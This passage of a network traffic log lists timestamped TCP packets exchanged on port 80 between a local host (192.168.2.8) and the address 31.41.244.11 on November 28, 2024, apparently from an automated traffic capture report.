                                                  Nov 28, 2024 13:12:14.366800070 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.366841078 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.366884947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.366923094 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.368618011 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.368634939 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.368659973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.368680000 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.368896008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.368941069 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.368977070 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.369018078 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.369693995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.369735003 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.369777918 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.369818926 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.370699883 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.370743036 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.370755911 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.370798111 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.371728897 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.371779919 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.371826887 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.371869087 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.372791052 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.372832060 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.372876883 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.372917891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.373584032 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.373632908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.373693943 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.373730898 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.374758005 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.374800920 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.374893904 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.374936104 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.375575066 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.375616074 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.375617981 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.375658989 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.376509905 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.376552105 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.376595020 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.376638889 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.377547026 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.377583981 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.377803087 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.377839088 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.378618956 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.378659964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.378693104 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.378761053 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.383477926 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.383531094 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.383547068 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.383586884 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.383770943 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.383815050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.383851051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.383888006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.384738922 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.384797096 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.384906054 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.384944916 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.385720968 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.385761976 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.385806084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.385845900 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.386445045 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.386482954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.386554003 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.386593103 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.387665033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.387706995 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.387880087 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.387921095 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.388847113 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.388887882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.389035940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.389081001 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.390074968 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.390117884 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.390466928 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.390511990 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.391601086 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.391640902 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.391833067 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.391872883 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.392493963 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.392551899 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.392596960 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.392641068 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.393352985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.393393993 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.393521070 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.393563032 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.394131899 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.394175053 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.394435883 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.394475937 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.395018101 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.395059109 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.395127058 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.395168066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.395688057 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.395729065 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.395766020 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.395807028 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.542975903 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.543004990 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.543057919 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.543059111 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.543085098 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.543086052 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.543118954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.543131113 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.543764114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.543802977 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.543848991 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.543895960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.544563055 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.544636965 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.544646978 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.544677019 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.545448065 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.545495033 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.545538902 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.545577049 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.546406984 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.546446085 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.546467066 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.546511889 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.547414064 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.547455072 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.547530890 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.547569990 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.548371077 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.548410892 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.548492908 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.548536062 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.549345970 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.549382925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.549433947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.549479008 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.550332069 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.550384998 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.550446033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.550483942 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.551318884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.551373005 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.551415920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.551457882 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.552304029 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.552344084 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.552413940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.552453995 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.553385973 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.553430080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.553555012 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.553595066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.554238081 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.554276943 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.554321051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.554359913 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.555210114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.555250883 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.555322886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.555360079 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.556157112 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.556195974 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.556205988 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.556248903 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.557133913 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.557173967 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.557356119 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.557399035 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.558094025 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.558141947 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.558208942 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.558248043 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.559108973 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.559149027 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.559197903 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.559236050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.560142040 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.560185909 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.560321093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.560357094 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.561088085 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.561127901 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.561163902 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.561203957 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.562061071 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.562098980 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.562141895 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.562181950 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.562973022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.563014984 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.563081026 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.563118935 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.563942909 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.563977957 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.564039946 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.564081907 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.564945936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.564986944 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.565113068 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.565149069 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.565932035 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.565978050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.566021919 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.566061020 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.566864014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.566910028 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.566997051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.567034960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.567823887 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.567873955 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.567964077 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.568005085 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.568823099 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.568862915 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.568939924 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.568979979 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.569777966 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.569823980 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.570003033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.570044041 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.570827961 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.570872068 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.570902109 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.570940018 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.571746111 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.571796894 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.571799040 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.571837902 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.572700024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.572750092 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.572798014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.572838068 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.573662996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.573719025 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.573765039 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.573812962 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.574644089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.574692965 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.574861050 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.574899912 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.575625896 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.575676918 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.575715065 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.575754881 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.576617002 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.576658964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.576723099 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.576756954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.577554941 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.577594995 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.577666044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.577704906 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.578536034 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.578576088 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.578639030 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.578680992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.579490900 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.579531908 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.579627037 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.579664946 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.580467939 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.580509901 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.584852934 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.584909916 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.584964991 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.585036993 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.585385084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.585422039 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.585473061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.585516930 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.586334944 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.586379051 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.586473942 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.586514950 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.587285995 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.587332964 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.587578058 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.587616920 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.587697983 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.587735891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.588558912 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.588607073 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.588681936 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.588722944 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.589510918 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.589554071 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.589653015 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.589688063 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.590533972 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.590583086 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.590620041 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.590660095 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.591469049 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.591511011 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.591553926 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.591593981 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.592454910 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.592510939 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.592603922 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.592645884 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.593470097 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.593518019 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.593560934 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.593602896 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.594391108 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.594429970 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.594543934 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.594583988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.595375061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.595427036 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.595478058 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.595516920 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.596354961 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.596398115 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.596445084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.596487045 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.743695974 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.743927002 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.743987083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.744013071 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.744050980 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.744326115 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.744368076 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.744432926 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.744533062 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.744607925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.745230913 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.745290041 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.745364904 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.745398998 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.746265888 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.746311903 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.746376991 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.746407986 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.747173071 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.747210026 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.747256994 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.747303009 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.748167992 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.748203993 CET4971680192.168.2.831.41.244.11
